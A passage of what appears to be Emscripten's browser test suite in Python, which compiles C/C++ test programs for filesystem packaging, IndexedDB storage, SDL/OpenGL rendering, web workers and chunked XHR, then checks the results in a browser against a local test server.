self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
# load the data into LZ4FS manually at runtime. This means we compress on the client, which is generally not recommended.
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'], timeout=60)
'''# non-lz4 for comparison
try:
os.mkdir('files')
except:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'], timeout=60)'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
open('data.dat', 'w').write(' ')
run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
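# Drives idbstore.c through a fixed sequence of stages (passed via -DSTAGE) against the same secret, clearing
# the working directory before each run so that only IndexedDB state carries over between stages.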
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'])
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17')
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file', path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
@requires_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
@requires_hardware
def test_egl(self):
open(os.path.join(self.get_dir(), 'test_egl.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl.c'), '-o', 'page.html', '-lEGL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html', '-lEGL', '-lGL']).communicate()
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
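# Builds hello_world_worker.cpp as a web worker (with and without a preloaded data file) and uses a small
# main.html that forwards the worker's message to /report_result.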
def do_test_worker(self, args=[]):
# Test running in a web worker
open('file.dat', 'w').write('data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.test_port)
html_file.close()
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
assert os.path.exists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20|' + ('data%20for%20w' if file_data else '') + '|')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
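# Starts a local server that serves random data in small chunks, then checksums a lazily-created file
# downloaded via synchronous XHR inside a web worker and compares it against the adler32 computed here.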
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.test_port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
run_process([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10*chunkSize+1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True,chunkSize,data,checksum,self.test_port))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
# Avoid a race condition on cleanup: wait a bit so that processes have released their file locks
# and test tearDown won't attempt to rmdir() files that are still in use.
if WINDOWS:
time.sleep(2)
@requires_hardware
def test_glgears(self):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
@requires_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(30, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut'] + (['--proxy-to-worker'] if proxy else []), timeout=30)
@requires_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []),
).communicate()
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_hardware
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')), args=args, timeout=30)
@requires_hardware
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
#(os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
#(os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1', '-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
def test_emscripten_api(self):
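    # Run once normally and once with main() proxied to a pthread (USE_PTHREADS + PROXY_TO_PTHREAD).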
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
      self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'] + args)
def test_emscripten_api2(self):
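    # Package file1.txt/file2.txt with the file packager (output captured into script2.js) and run
    # with FORCE_FILESYSTEM=1; then repeat with the .data file emitted into a subdirectory.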
def setup():
open('script1.js', 'w').write('''
Module._set(456);
''')
open('file1.txt', 'w').write('first');
open('file2.txt', 'w').write('second');
setup()
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
    # check using the file packager with its output going to another dir
self.clear()
setup()
os.mkdir('sub')
Popen([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'NO_EXIT_RUNTIME=0']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
def test_emscripten_main_loop_settimeout(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
  # Covered by the dEQP test suite (we can remove this test later if we add coverage for that).
@requires_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_hardware
def test_gl_textures(self):
self.btest('gl_textures.cpp', '0', args=['-lGL'])
@requires_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_hardware
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_hardware
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_hardware
def test_cubegeom_proc(self):
open('side.c', 'w').write(r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_hardware
  def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_fog(self):
